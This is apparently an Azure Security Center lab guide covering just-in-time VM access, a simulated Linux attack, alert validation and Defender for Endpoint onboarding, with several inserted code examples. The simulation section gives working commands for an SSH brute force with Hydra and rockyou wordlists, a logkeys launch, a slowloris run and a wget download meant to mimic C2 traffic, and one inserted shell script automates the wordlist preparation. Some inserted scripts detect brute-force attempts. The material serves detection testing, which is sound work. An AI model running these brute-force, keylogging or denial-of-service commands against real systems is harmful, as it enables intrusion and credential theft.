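The rule ordering described above, as an added example (not Security Center's code or the Azure SDK): a small Python model of an NSG in which enabling JIT adds a deny rule, an approved request inserts a timed allow rule for one source ahead of it, expiry restores the previous state, and a check flags the case the text warns about, where a pre-existing rule on the port outranks the JIT deny. Rule names, priorities, addresses and timestamps are constructed.

```python
"""Constructed model of how just-in-time (JIT) VM access drives NSG rules.
Not Security Center's code: it reproduces the ordering the text describes
(existing rules keep priority over the JIT deny; an approved request adds a
timed allow for one source; expiry restores the previous state)."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass
class Rule:
    name: str
    priority: int                       # lower number is evaluated first
    port: int
    access: str                         # "Allow" or "Deny"
    source: str = "*"                   # "*" (any) or a CIDR
    expires: Optional[datetime] = None  # set only on JIT-created allows


@dataclass
class Nsg:
    rules: list = field(default_factory=list)

    def for_port(self, port):
        return sorted((r for r in self.rules if r.port == port),
                      key=lambda r: r.priority)

    def evaluate(self, port, src_ip, now):
        """First matching rule by priority decides; expired JIT allows are
        skipped; no match falls through to the platform default, which
        denies inbound traffic from the internet."""
        for r in self.for_port(port):
            if r.expires is not None and r.expires <= now:
                continue
            if r.source == "*" or ip_address(src_ip) in ip_network(r.source):
                return r.access
        return "Deny"

    def enable_jit(self, port):
        """Add the 'deny all inbound' rule for a protected port. Existing
        rules on that port keep priority over it, so the deny lands just
        after them; with no existing rules it takes the top slot."""
        existing = self.for_port(port)
        prio = existing[-1].priority + 1 if existing else 100
        self.rules.append(Rule(f"JIT-Deny-{port}", prio, port, "Deny"))
        return prio

    def request_access(self, port, src_cidr, minutes, now, max_minutes):
        """Approve a request: an allow rule for the caller's source goes in
        just ahead of the JIT deny, for at most the port's maximum window."""
        if minutes > max_minutes:
            raise ValueError(f"{minutes} min exceeds the {max_minutes} min maximum")
        deny = next(r for r in self.for_port(port) if r.name == f"JIT-Deny-{port}")
        rule = Rule(f"JIT-Allow-{port}", deny.priority - 1, port, "Allow",
                    src_cidr, now + timedelta(minutes=minutes))
        self.rules.append(rule)
        return rule

    def expire(self, now):
        """Drop JIT allows whose window has ended and return how many were
        removed. Connections already established are not affected."""
        before = len(self.rules)
        self.rules = [r for r in self.rules
                      if r.expires is None or r.expires > now]
        return before - len(self.rules)


def jit_is_effective(nsg, port):
    """Defender check: True only if the JIT deny is reached before any
    allow-from-anywhere rule on the port; otherwise the management port
    stays exposed even though JIT shows as configured."""
    for r in nsg.for_port(port):
        if r.name == f"JIT-Deny-{port}":
            return True
        if r.access == "Allow" and r.source == "*":
            return False
    return False


def scenario():
    """Run a clean NSG and one with a pre-existing broad allow; return the
    observations so they can be checked."""
    t0 = datetime(2021, 3, 1, 9, 0)     # constructed timestamp
    nsg = Nsg()                         # no pre-existing rules on port 22
    nsg.enable_jit(22)
    closed = nsg.evaluate(22, "203.0.113.5", t0)
    nsg.request_access(22, "203.0.113.5/32", 60, t0, max_minutes=180)
    during = t0 + timedelta(minutes=30)
    after = t0 + timedelta(minutes=61)
    result = {"closed": closed,
              "requester": nsg.evaluate(22, "203.0.113.5", during),
              "other": nsg.evaluate(22, "198.51.100.7", during),
              "expired": nsg.evaluate(22, "203.0.113.5", after),
              "removed": nsg.expire(after),
              "clean_effective": jit_is_effective(nsg, 22)}
    exposed = Nsg([Rule("AllowSSH-Any", 300, 22, "Allow")])  # the bad case
    exposed.enable_jit(22)
    result["exposed_any"] = exposed.evaluate(22, "198.51.100.7", t0)
    result["exposed_effective"] = jit_is_effective(exposed, 22)
    return result


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```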

How Security Center identifies which VMs should have JIT applied:

Enable JIT from Azure Security Center

From Security Center, you can enable and configure the JIT VM access.

1. Open the Azure Defender dashboard and, from the advanced protection area, select Just-in-time
VM access.

The Just-in-time VM access page opens with your VMs grouped into the following tabs:
• Configured - VMs that have already been configured to support just-in-time VM
access. For each VM, the Configured tab shows:
• the number of approved JIT requests in the last seven days
• the last access date and time
• the connection details configured
• the last user
• Not configured - VMs without JIT enabled, but that can support JIT. We recommend
that you enable JIT for these VMs.
• Unsupported - VMs without JIT enabled and which don't support the feature. Your VM
might be in this tab for the following reasons:
• Missing network security group (NSG) - JIT requires an NSG to be configured
• Classic VM - JIT supports VMs that are deployed through Azure Resource
Manager, not 'classic deployment'. Learn more about classic vs Azure Resource
Manager deployment models.
• Other - Your VM might be in this tab if the JIT solution is disabled in the security
policy of the subscription or the resource group.

2. From the Not configured tab, mark the VMs to protect with JIT and select Enable JIT on
VMs.

The JIT VM access page opens listing the ports that Security Center recommends
protecting:
• 22 - SSH
• 3389 - RDP
• 5985 - WinRM
• 5986 - WinRM

To accept the default settings, select Save.

3. To customize the JIT options:

• Add custom ports with the Add button.
• Modify one of the default ports by selecting it from the list.

For each port (custom and default), the Add port configuration pane offers the
following options:
• Protocol - The protocol that is allowed on this port when a request is approved
• Allowed source IPs - The IP ranges that are allowed on this port when a request is
approved
• Maximum request time - The maximum time window during which a specific port
can be opened

Set the port security to your needs, then select OK.

4. Select Save.

Editing JIT Configuration in Security Center

You can change a VM's existing just-in-time policy by adding and configuring a new port to
open for that VM, or by changing any other parameter related to an already protected port.

To edit a VM's existing just-in-time policy, use the Configured tab:

1. Under VMs, select a VM to add a port to by clicking on the three dots within the row for
that VM. This opens a menu.

2. Select Edit in the menu. This opens JIT VM access configuration.

3. Under JIT VM access configuration, you can either edit the existing settings of an already
protected port by clicking on its port, or you can select Add. This opens Add port
configuration.

4. Under Add port configuration, identify the port, protocol type, allowed source IPs, and
maximum request time.
5. Select OK.
6. Select Save.

Request access to a JIT-enabled VM from Azure Security Center

1. From the Just-in-time VM access page, select the Configured tab.

2. Mark the VMs you want to access.

• The icon in the Connection Details column indicates whether JIT is enabled on
the network security group or firewall. If it's enabled on both, only the firewall
icon appears.
• The Connection Details column provides the information required to connect to
the VM, and its open ports.

3. Select Request access. The Request access window opens.

4. Under Request access, for each VM, configure the ports that you want to open,
the source IP addresses from which each port is opened, and the time window for
which the port will be open. You can only request access to the configured ports.
Each port has a maximum allowed time derived from the JIT configuration you've
created.
5. Select Open ports.

If a user who is requesting access is behind a proxy, the option My IP may not work. You may
need to define the full IP address range of the organization.

Audit JIT access activity in Security Center

You can gain insights into VM activities using log search. To view the logs:

1. From Just-in-time VM access, select the Configured tab.

2. For the VM that you want to audit, open the ellipsis menu at the end of the row.
3. Select Activity Log from the menu.

4. The activity log provides a filtered view of previous operations for that VM along
with time, date, and subscription.
5. To download the log information, select Download as CSV.

Simulate and detect attacks on Linux

Security Center uses a variety of detection capabilities to alert customers to potential attacks
targeting their environments. For Linux, Security Center uses auditd to collect records from Linux
machines. Auditd records are collected, aggregated into events, and enriched using the latest
version of the Microsoft Monitoring Agent. Audit events are stored in your workspace and
analyzed by Security Center. When threats are detected, a Security Center alert is generated.

In this scenario the attacker (VM1) starts by sending an SSH brute force attack against its
target machine (VM2). After gaining access, it compiles a suspicious file and, to finalize the
attack, initiates a remote shell with another machine. For this example, the remote shell
execution will be done against VM1. Optionally you could provision three VMs and perform
the last step against VM3, but this is not mandatory.

Prerequisites

You will need an Azure environment with at least two Linux virtual machines (VMs). These VMs should
have the following Linux distributions installed:

• AttackerVM: Kali Linux obtained from the Azure Marketplace.
• VictimVM: Ubuntu version 12.04 LTS, 14.04 LTS or 16.04 LTS (for the latest list of supported
Ubuntu versions, see the Supported platforms in Azure Security Center article).
o VictimVM is the only VM on which you must ensure that the Security Center agent is
installed and operational.
o Make sure to take note of the public IP address of this VM after provisioning it.

Enable Azure Defender for Servers in Security Center's Pricing & settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers in the Azure Defender plans page.

Note: for more information on how to provision a Linux VM in Azure, visit this article.

AttackerVM

1. When provisioning this VM, make sure to:
a. Enable password authentication
b. Enable external access through SSH.
2. Make sure to take note of the public IP address of this VM after provisioning it.

VictimVM

1. When provisioning this VM, make sure to:
a. Enable password authentication
b. Enable external access through SSH.
2. Make sure to take note of the public IP address of this VM after provisioning it.
3. After provisioning VictimVM, check if auditd is running by using service auditd status
4. If the command fails, it is because you don’t have auditd installed. In this case, install auditd
using the command sudo apt install auditd

5. Once it finishes, verify that auditd is running by using the same command that you used in
step 3.
6. Install the dnsutils package by running sudo apt install dnsutils
7. Create five local user accounts in this VM (use any names and passwords you want). These
users will be used during the first exercise (SSH brute force attack). To create a user
account use the command sudo adduser <username>. To set the user’s password you can
use the command sudo passwd <username>.

Verify VM Status in Security Center

1. After provisioning this VM, enable Azure Security Center at the subscription level, and the
agent will be automatically installed on the VM. Read the Enable Data Collection article for
more details on this.
a. If you are using an existing subscription with Azure Security Center already
enabled, and auto provisioning is off for business reasons, you need to install the
agent manually. Refer to this article for more information on how to install it.
2. If you have not enabled Azure Defender for Servers yet, you will need to do so before
continuing.

3. Before proceeding, open the Security Center dashboard, go to Inventory and search for the
VM where Ubuntu is installed (VM2), and make sure that the Monitoring State field is
showing as Monitored by Azure Security Center. Also verify that the Monitoring agent health
issues and Install monitoring agent on your machines assessments are showing as
healthy, as shown in the example below:

Note:
It can take up to 12 to 14 hours to have the agent in healthy state. Don’t proceed to the
tests unless it is healthy.

Executing the Attack

The steps that follow are grouped in the different phases of the cyber kill chain.

Cyber kill chain phase: Target and Attack

SSH brute force attack against Linux servers is still a widely used method to establish an initial
footprint. In 2018 attackers used GoScanSSH to target public-facing SSH servers, while
avoiding those that were linked to government and military IP addresses. Without a monitoring
system in place, the likelihood is high that this attack will succeed and you will not be aware of it. If
your workload is in Azure, you can reduce the likelihood that this attack will succeed by using the
just-in-time VM access feature in Security Center. To simulate how Security Center will detect
this attack, execute the steps below.
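The collection and aggregation pipeline described in the introduction to this section (auditd records aggregated into events and analysed), and the SSH brute force pattern described just above, as an added example from the defender's side (not Security Center's code): auditd USER_AUTH records written by sshd are parsed, failures are aggregated per source address, and an event is raised when a burst of failures, or a successful authentication after one, is seen. The sample records, thresholds and alert names are constructed assumptions.

```python
"""Constructed detector that aggregates auditd USER_AUTH records from sshd
into SSH brute-force events. Not Security Center's logic: it illustrates
the collect / aggregate / alert pipeline the text describes. The records
are constructed in the auditd format; thresholds and alert names are
assumptions."""
import re
from collections import defaultdict, deque

AUDIT_RE = re.compile(
    r'type=(?P<type>\w+) msg=audit\((?P<ts>\d+\.\d+):\d+\):.*?'
    r'acct="(?P<acct>[^"]*)".*?addr=(?P<addr>\S+).*?res=(?P<res>\w+)')

FAIL_THRESHOLD = 10    # assumption: this many failures from one source ...
WINDOW_SECONDS = 60    # ... within this window count as brute force


def parse_record(line):
    """Return the fields of an sshd PAM authentication record, else None."""
    m = AUDIT_RE.search(line)
    if not m or m.group("type") != "USER_AUTH":
        return None
    return {"ts": float(m.group("ts")), "acct": m.group("acct"),
            "addr": m.group("addr"), "res": m.group("res")}


def detect(lines):
    """Aggregate records per source address and emit alerts: a Medium one
    when the failure burst crosses the threshold, and a High one if the
    same source then authenticates successfully (what a working guessed
    credential looks like from the victim's side)."""
    recent = defaultdict(deque)   # addr -> timestamps of failures in window
    accounts = defaultdict(set)   # addr -> distinct accounts tried
    flagged, alerts = set(), []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        addr, ts = rec["addr"], rec["ts"]
        if rec["res"] == "failed":
            q = recent[addr]
            q.append(ts)
            accounts[addr].add(rec["acct"])
            while q and ts - q[0] > WINDOW_SECONDS:
                q.popleft()
            if len(q) >= FAIL_THRESHOLD and addr not in flagged:
                flagged.add(addr)
                alerts.append({"severity": "Medium",
                               "name": "SSH brute force attempt",
                               "addr": addr, "failures": len(q),
                               "accounts": len(accounts[addr]), "ts": ts})
        elif rec["res"] == "success" and addr in flagged:
            alerts.append({"severity": "High",
                           "name": "Successful SSH brute force",
                           "addr": addr, "acct": rec["acct"], "ts": ts})
    return alerts


def audit_line(ts, seq, acct, addr, res):
    """Constructed line in the shape of the auditd USER_AUTH record written
    when sshd's PAM stack authenticates a user."""
    return (f"type=USER_AUTH msg=audit({ts:.3f}:{seq}): pid=2345 uid=0 "
            f"auid=4294967295 ses=4294967295 msg='op=PAM:authentication "
            f'acct="{acct}" exe="/usr/sbin/sshd" hostname={addr} addr={addr} '
            f"terminal=ssh res={res}'")


def sample_records():
    """Constructed log: one mistyped password from a legitimate host, then a
    12-account guessing run from another source that ends in a success,
    followed by an unrelated record type that the parser must skip."""
    base = 1614588000.0
    lines = [audit_line(base + 5, 1, "alice", "198.51.100.7", "failed"),
             audit_line(base + 9, 2, "alice", "198.51.100.7", "success")]
    guessed = ["root", "admin", "test", "user", "guest", "oracle",
               "pi", "ubuntu", "bob", "alice", "postgres", "git"]
    for i, acct in enumerate(guessed):
        lines.append(audit_line(base + 20 + 2 * i, 10 + i, acct,
                                "203.0.113.5", "failed"))
    lines.append(audit_line(base + 50, 30, "bob", "203.0.113.5", "success"))
    lines.append("type=CRED_ACQ msg=audit(1614588051.000:31): pid=2345 uid=0 "
                 "msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/sbin/sshd\" "
                 "addr=203.0.113.5 terminal=ssh res=success'")
    return lines


if __name__ == "__main__":
    for alert in detect(sample_records()):
        print(alert)
```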

1. To launch the SSH brute force attack from the Kali Linux machine, you will need to use a
built-in list of users and passwords. Since this is a very long list, you will create a reduced
copy of this file. Logon to AttackerVM using SSH, and perform the following tasks.
cd /usr/share/wordlists
sudo -s
gzip -d rockyou.txt.gz
head -n 20 rockyou.txt > user.txt
head -n 20 rockyou.txt > pass.txt

2. Using your preferred text editor (if you don’t have one, you can use a text editor from
Midnight Commander – type sudo mc to start it, select the file to edit and press F4),
open the user.txt file (you may need to use sudo) and leave only 20 entries in there
(remove all other words). Once you finish, add the name of the 5 users that you created
on VictimVM. Make sure to randomize the location, for example: insert one valid
username after the fifth entry, another after the seventh entry and so on.

3. Repeat the same procedure for the file pass.txt. In this case, you will insert the valid
passwords that you used for the five accounts that you created. Randomize the passwords
in a different order than you randomized the usernames.
4. Now that everything is in place, use Hydra to launch the attack against VictimVM. Type the
command below on the Kali VM, replacing <IP> with the public IP address of VictimVM (-t 4
limits the number of parallel connections so that sshd does not start refusing them):
hydra -I -L user.txt -P pass.txt <IP> -t 4 ssh

After a while you should start getting results.

5. Take note of one of the discovered credentials. You will use it in the next steps.
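The following shell script is an added example and is not part of the guide: it automates steps 1 to 3 above by splicing the five valid credentials into a reduced wordlist at fixed offsets, and checks that every credential actually landed in the file before Hydra is run. It uses a small constructed filler list in place of rockyou.txt, the account names and passwords are placeholders for the five accounts you created on VictimVM, and the Hydra command is only printed, not executed.

```shell
#!/bin/sh
# Added example (not from the guide). Builds user.txt / pass.txt for the Hydra
# step by splicing valid credentials into a filler list at fixed offsets.
# Assumes POSIX sh + awk. rockyou.txt is replaced by a constructed filler list
# so that this runs offline; the lab account names/passwords are placeholders.
set -eu

# mix_wordlist BASE VALID START STEP OUT
#   Copies BASE to OUT, inserting the i-th line of VALID after filler line
#   START + i*STEP (the "after the fifth entry, then the seventh" pattern).
#   Valid entries that do not fit before BASE ends are appended at the end.
mix_wordlist() {
  awk -v start="$3" -v step="$4" '
    NR == FNR { valid[++nv] = $0; next }             # first file: valid entries
    {
      print; n++
      if (vi < nv && n == start + vi * step) print valid[++vi]
    }
    END { while (vi < nv) print valid[++vi] }
  ' "$2" "$1" > "$5"
}

# check_contains LIST VALID: exit 0 only if every line of VALID is in LIST
check_contains() {
  while IFS= read -r entry; do
    grep -qxF -- "$entry" "$1" || { echo "missing: $entry" >&2; return 1; }
  done < "$2"
}

# hydra_cmd TARGET: the guide's Hydra invocation. -t 4 keeps the number of
# parallel SSH connections low so sshd does not start dropping attempts;
# -I ignores a stale hydra.restore file left by an earlier run.
hydra_cmd() {
  printf 'hydra -I -L user.txt -P pass.txt %s -t 4 ssh\n' "$1"
}

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Constructed stand-in for "head -n 20 rockyou.txt"
awk 'BEGIN { for (i = 1; i <= 20; i++) printf "word%02d\n", i }' > "$work/base.txt"
# Constructed placeholders for the five accounts created on VictimVM
printf '%s\n' labuser1 labuser2 labuser3 labuser4 labuser5 > "$work/valid_users.txt"
printf '%s\n' 'Lab!Pass1' 'Lab!Pass2' 'Lab!Pass3' 'Lab!Pass4' 'Lab!Pass5' > "$work/valid_pass.txt"

# Users go after filler lines 5,7,9,11,13; passwords after 3,7,11,15,19, so the
# two files are not aligned.
mix_wordlist "$work/base.txt" "$work/valid_users.txt" 5 2 "$work/user.txt"
mix_wordlist "$work/base.txt" "$work/valid_pass.txt"  3 4 "$work/pass.txt"
check_contains "$work/user.txt" "$work/valid_users.txt"
check_contains "$work/pass.txt" "$work/valid_pass.txt"

echo "user.txt: $(wc -l < "$work/user.txt" | tr -d ' ') entries, pass.txt: $(wc -l < "$work/pass.txt" | tr -d ' ') entries"
echo "run on the Kali VM, from the directory holding both files:"
hydra_cmd 203.0.113.10   # 203.0.113.10 stands in for VictimVM's public IP
```

With the offsets above each file has 25 entries, so Hydra has at most 625 login/password pairs to try; the first valid pair is reached when the username and password positions line up in its nested loop.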

Cyber kill chain phase: Install and Exploit

In this phase of the cyber kill chain, Security Center looks for lateral movement, suspicious
process execution, and other actions that are usually carried out at this stage, such as an attacker
launching a hacking tool to perform malicious operations. The commands that follow must be
executed on VictimVM.

1. Log on to VictimVM via SSH using one of the brute-forced credentials.

2. Run the command below to simulate an attacker starting logkeys to capture credentials and
other useful information:
logkeys --start

Note:
If logkeys is not installed you will receive an error message, but for the purpose of this
example that does not matter: Security Center detects the attempted launch regardless of
whether the tool actually runs.

3. Attackers can also use this phase for internal reconnaissance and, based on what they find,
launch attacks against other systems on the internal network. For this example, the assumption
is that the attacker has already performed some internal recon with nmap to enumerate the
servers and the domain, and is now going to use a hacking tool to launch an attack against a
web server. Run the command below:
perl slowloris.pl -dns server.contoso.com

Note:
You will receive an error message if this script is not on your system, but for the purpose of
this example you don't need to worry about that error.
Cyber kill chain phase: Post Breach

In this phase of the cyber kill chain, attackers usually communicate with command and control
(C2) infrastructure, either to exfiltrate data to the C2 server or to download more malicious
software. For this example, you will download the EICAR test file (a harmless string that
antimalware products are designed to detect as if it were malware) using wget. The commands
that follow must be executed on VictimVM (the Ubuntu VM).

1. First, resolve the IP address of the download host:
nslookup www.eicar.org

2. Download the file:
wget http://www.eicar.org/download/eicar.com

Note:
If you have issues downloading eicar.com, try downloading eicar.com.txt instead.

3. Once you finish, you can delete the test file:
rm -f eicar.com

Reviewing Security Center Alerts

Now it is time to review the alerts generated by Security Center during this simulation. Follow the
steps below to do that.

1. Open Azure Security Center dashboard.


2. On the left pane, click Security Alerts.

3. Sort the alerts by date by clicking the Date column, and start reviewing them.
4. Notice that the first alert you will receive corresponds to the SSH brute force attack
simulation. In the description of this alert, you will see the username that successfully
logged in via SSH.

5. Next you will see the logkeys detection, through the Potential credential access tool
detected alert. In this alert's description you may see another process name (instead of
logkeys) if you don't have this tool installed. In the example that follows, the process shown
is python3.6.

6. Next you will see the hacking tool detection, through the Possible attack tool detected
alert. This alert shows the details of the command line and the suspicious process ID, as
shown below:

7. The last alert in the list is Detected suspicious file download, which contains the
details of the command line that was executed to download the malware test file.
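To make concrete what the SSH brute force alert in step 4 is reporting, here is an added example (it is neither the guide's code nor Security Center's own detection logic): a small POSIX shell/awk detector run over constructed sshd log lines in the format found in /var/log/auth.log. It counts failed logins per source address and, when a later successful login comes from an address that already failed, reports that user name as the likely compromised account, which is the detail the alert description shows. The log lines, host name and addresses are constructed for this example.

```shell
#!/bin/sh
# Added example (not the guide's or Security Center's code): brute-force
# detection over sshd syslog lines. Assumes POSIX sh + awk and the standard
# OpenSSH "Failed password for ..." / "Accepted password for ..." formats.
set -eu

# detect_bruteforce LOG THRESHOLD
#   Prints one line per source IP with >= THRESHOLD failed logins:
#     <ip> failures=<n> success_user=<user|->
#   success_user is set when a login from that IP succeeded *after* failures,
#   which is the "username that successfully logged in" the alert reports.
detect_bruteforce() {
  awk -v thr="$2" '
    function src_ip(line) { sub(/.* from /, "", line); sub(/ port .*/, "", line); return line }
    function user_of(line) { sub(/.* for /, "", line); sub(/ from .*/, "", line); return line }
    /sshd\[[0-9]+\]: Failed password for / { fail[src_ip($0)]++ }
    /sshd\[[0-9]+\]: Accepted (password|publickey) for / {
      ip = src_ip($0)
      if (fail[ip] > 0) hit[ip] = user_of($0)   # success following failures
    }
    END {
      for (ip in fail)
        if (fail[ip] >= thr)
          printf "%s failures=%d success_user=%s\n", ip, fail[ip], (ip in hit) ? hit[ip] : "-"
    }
  ' "$1" | sort
}

log=$(mktemp)
trap 'rm -f "$log"' EXIT
# Constructed sample: a Hydra run from 198.51.100.7 that hits a valid
# password on its ninth attempt, plus an admin who mistypes a password once
# after a successful key-based login (not flagged: the failure came later).
cat > "$log" <<'EOF'
Mar  1 10:00:01 victimvm sshd[1201]: Failed password for invalid user word01 from 198.51.100.7 port 40112 ssh2
Mar  1 10:00:01 victimvm sshd[1202]: Failed password for invalid user word02 from 198.51.100.7 port 40113 ssh2
Mar  1 10:00:02 victimvm sshd[1203]: Failed password for labuser1 from 198.51.100.7 port 40114 ssh2
Mar  1 10:00:02 victimvm sshd[1204]: Failed password for labuser1 from 198.51.100.7 port 40115 ssh2
Mar  1 10:00:03 victimvm sshd[1205]: Failed password for invalid user word03 from 198.51.100.7 port 40116 ssh2
Mar  1 10:00:03 victimvm sshd[1206]: Failed password for labuser2 from 198.51.100.7 port 40117 ssh2
Mar  1 10:00:04 victimvm sshd[1207]: Failed password for invalid user word04 from 198.51.100.7 port 40118 ssh2
Mar  1 10:00:04 victimvm sshd[1208]: Failed password for labuser2 from 198.51.100.7 port 40119 ssh2
Mar  1 10:00:05 victimvm sshd[1209]: Accepted password for labuser2 from 198.51.100.7 port 40120 ssh2
Mar  1 10:05:00 victimvm sshd[1300]: Accepted publickey for azureuser from 203.0.113.5 port 51000 ssh2
Mar  1 10:06:00 victimvm sshd[1301]: Failed password for azureuser from 203.0.113.5 port 51002 ssh2
EOF

# A threshold of 5 is a typical starting point; tune it against your own
# baseline of failed logins, and add a time window for production use.
detect_bruteforce "$log" 5
```

The ordering check matters: a failure that happens after a legitimate login is normal user error, so the admin's single typo from 203.0.113.5 never gets a success_user attached, even when the threshold is lowered to 1.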

Alerts validation
Alerts are the notifications that Security Center generates when it detects threats on your
resources. It prioritizes and lists the alerts along with the information needed to quickly
investigate the problem. Security Center also provides recommendations for how you can
remediate an attack. For more information, see Security alerts in Security Center and Managing
and responding to security alerts.

This scenario is dedicated to generating a test alert on Windows and Linux machines. It is
probably the easiest and fastest way to validate that machines are indeed protected by
Azure Security Center.

Validate alerts for Windows machines

1. Log on to a Windows machine onboarded to Azure Security Center. This could be the
Windows VM you prepared as a part of the delivery pre-requisites.
2. Copy an executable (for example – calc.exe) to the computer’s desktop, or other
directory of your convenience, and rename it as ASC_AlertTest_662jfi039N.exe.
3. Open the command prompt and execute this file with an argument (any fake argument
name will do), such as: ASC_AlertTest_662jfi039N.exe -foo
4. Wait 5 to 10 minutes and open Security Center Alerts. An alert similar to the one below
should be displayed.

Validate alerts for Linux machines

1. Log on to a Linux machine onboarded to Azure Security Center. This could be the Linux
VM you prepared as a part of the delivery pre-requisites.
2. Copy an executable to a convenient location and rename it asc_alerttest_662jfi039n,
for example: cp /bin/echo ./asc_alerttest_662jfi039n
3. From a shell, execute the file with the following arguments: ./asc_alerttest_662jfi039n testing
eicar pipe
4. Wait 5 to 10 minutes and open Security Center Alerts. An alert similar to the example
below should be displayed.

Security Center's integrated EDR solution Microsoft Defender for
Endpoint

Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution.
Its main features are:

• Risk-based vulnerability management and assessment
• Attack surface reduction
• Behavioral based and cloud-powered protection
• Endpoint detection and response (EDR)
• Automatic investigation and remediation
• Managed hunting services

Pre-requisites

Enabling Security Center's integrated EDR solution, Microsoft Defender for Endpoint,
requires Azure Defender for servers to be enabled on the subscription.

Supported platforms:

• Azure machines running Windows
• Azure Arc machines running Windows

Supported versions of Windows:

Defender for Endpoint is built into Windows 10 1703 (and newer) and Windows Server 2019.
Security Center supports detection on Windows Server 2016, 2012 R2, and 2008 R2 SP1.
Server endpoint monitoring using this integration has been disabled for Office 365 GCC
customers.
Required roles and permissions:

To enable/disable the integration: Security admin or Owner

To view Microsoft Defender for Endpoint (MDE) alerts in Security Center: Security
reader, Reader, Resource Group Contributor, Resource Group Owner, Security
admin, Subscription owner, or Subscription Contributor

Enable Azure Defender for Servers in Security Center's pricing and settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers on the Azure Defender plans page.

Microsoft Defender for Endpoint tenant location

When you use Azure Security Center to monitor your servers, a Microsoft Defender for
Endpoint tenant is automatically created. Data collected by Defender for Endpoint is
stored in the geo-location of the tenant as identified during provisioning. Customer
data - in pseudonymized form - may also be stored in the central storage and
processing systems in the United States.

After you've configured the location, you can't change it. If you need to move your data
to another location, contact Microsoft Support to reset the tenant.
Enabling the Microsoft Defender for Endpoint integration

1. Enable Azure Defender for servers. See Pricing of Azure Security Center.
2. If you've already licensed and deployed Microsoft Defender for Endpoint on your
servers, remove it using the procedure described in Offboard Windows servers.
3. From Security Center's menu, select Pricing & settings.
4. Select the subscription you want to change.
5. Select Threat detection.
6. Select Allow Microsoft Defender for Endpoint to access my data, and
select Save.

Azure Security Center will automatically onboard your servers to Microsoft Defender
for Endpoint. Onboarding might take up to 24 hours.

Automatically onboard Windows Server 2019 and Linux from Azure Security
Center to Microsoft Defender for Endpoint

Azure Defender for servers offers an integration with Microsoft Defender for Endpoint that
onboards servers automatically from Azure Security Center without manual interaction. At the
time of writing, however, this automated onboarding does not cover Windows Server 2019 or
Linux servers. The solution described below helps you find those servers, to get visibility, and
to run an automation that onboards them to Microsoft Defender for Endpoint.

Important: It’s recommended the steps below should be followed using the updated GitHub
guide

Release notes

• Version 2 - Supports both Azure VMs and Azure Arc machines running Linux (Ubuntu or
Debian distributions).
• Version 1 - Supports both Azure VMs and Azure Arc machines running Windows Server
2019.

What is it?

Using a custom policy initiative, Azure Security Center determines whether a machine is connected
to an Azure Defender for servers-enabled subscription and whether it has the Microsoft Defender for
Endpoint package installed. If the package is not installed, the server is marked as unhealthy.
From the recommendation, you can then select these machines and trigger the automation that
onboards them to Microsoft Defender for Endpoint.

Prerequisites

1. Microsoft Defender for Endpoint enrollment. This is created automatically once you
enable the Azure Security Center integration, as explained in the ASC documentation.

How it works

1. A built-in policy initiative ensures that the Guest Configuration agent is deployed on VMs:
[Preview]: Deploy prerequisites to enable Guest Configuration policies on virtual
machines.
2. A custom recommendation in ASC identifies Windows Server 2019 and Linux
machines that do not have MDE configured yet.
3. A Logic App automation is triggered manually, or automatically using workflow
automation, on the unhealthy resources.
4. A custom script extension (for both Azure VMs and Azure Arc machines) pulls the
onboarding script from the storage account and onboards the unhealthy resources.

Please note! The solution won't work if a custom script extension is already deployed on a
VM, because a VM can only have one custom script extension installed at a time.

Installation instructions

Identify potential machines using Azure Policy

1. In the Azure portal, navigate to the Azure Policy blade.
2. Assign the [Preview]: Deploy prerequisites to enable Guest Configuration policies on virtual
machines initiative. This step is necessary to deploy the guest configuration extension
on virtual machines (both Linux and Windows).
3. Use the Deploy to Azure link from the GitHub guide to deploy the solution's custom policy
definitions:
o On the Definition location, select either a subscription or a management
group. Click Save.
4. From Security Center's sidebar, select Security policy.
5. Select the desired scope for the policy initiative (either a subscription or a management
group).
6. In the Your custom initiatives section at the bottom, click Add a custom
initiative. On the Add custom initiatives page, click Create new. Provide the
following details:
o Name: MDE Onboarding
o Category: Security Center
o In the available definitions, click + Audit Windows Server 2019
machines that don't have Microsoft Defender for Endpoint
configured and + Audit Linux machines that don't have Microsoft
Defender for Endpoint configured.
o If you want to include Azure Arc machines, set the value to True.
o Click Save.
o MDE Onboarding now appears on the page. Click Add.
▪ Click Review + Create.
▪ Click Create.
o MDE Onboarding is now assigned in Security Center. Wait a few hours
until the new custom recommendation appears in the ASC
recommendations list.

Automate remediation using Logic App

1. Deploy the Logic App automation and a storage account with a private blob
container:
2. Use the Deploy to Azure link from the GitHub guide.
o Provide a name for the storage account.

3. Authorize the ARM-Configure-MDE Logic App connection:
o From the Logic App's sidebar, select API connections.
o Select the ARM-Configure-MDE connection.
o From the sidebar, select Edit API connection.
o Select Authorize and authenticate using your credentials.
o Select Save to apply your changes.

4. On the Azure Defender for servers-enabled subscription, navigate to the Microsoft Defender
Security Center onboarding page.
5. From the dropdown menu (operating system to start onboarding process),
select Windows Server 1803 and 2019.
6. On the Deployment method dropdown menu, select Group Policy and then
click Download package.
7. Extract the WindowsDefenderATPOnboardingPackage.zip package to get
the WindowsDefenderATPOnboardingScript.cmd file. This file is unique per
organization.
8. From the dropdown menu (operating system to start onboarding process),
select Linux Server.
9. Verify that Local script is selected as the deployment method and then click
Download onboarding package.
10. Extract the WindowsDefenderATPOnboardingPackage.zip package to get
the MicrosoftDefenderATPOnboardingLinuxServer.py file. This file is unique per
organization.
11. Download ConfigureDefender.zip and extract it.
12. Upload the four files
(WindowsDefenderATPOnboardingScript.cmd, MicrosoftDefenderATPOnboardingLinuxServer.py,
ConfigureDefender.ps1 and ConfigureDefender.sh) to the scripts private blob container
in the storage account. The two onboarding scripts are specific to your organization, so keep
the container private and restrict who can read from it.

Remediate unhealthy resources

Once the Azure Policy evaluation has completed, you should see two new custom recommendations,
one for Windows Server 2019 and one for Linux, as follows:

Within each recommendation, you can see all healthy and unhealthy resources. To remediate
unhealthy resources, select items from the list, click Trigger logic app, and select
Configure-MDE.

Please note! you can also use the workflow automation capability to automatically trigger
the logic app once a new unhealthy machine appears on the Audit Windows Server 2019
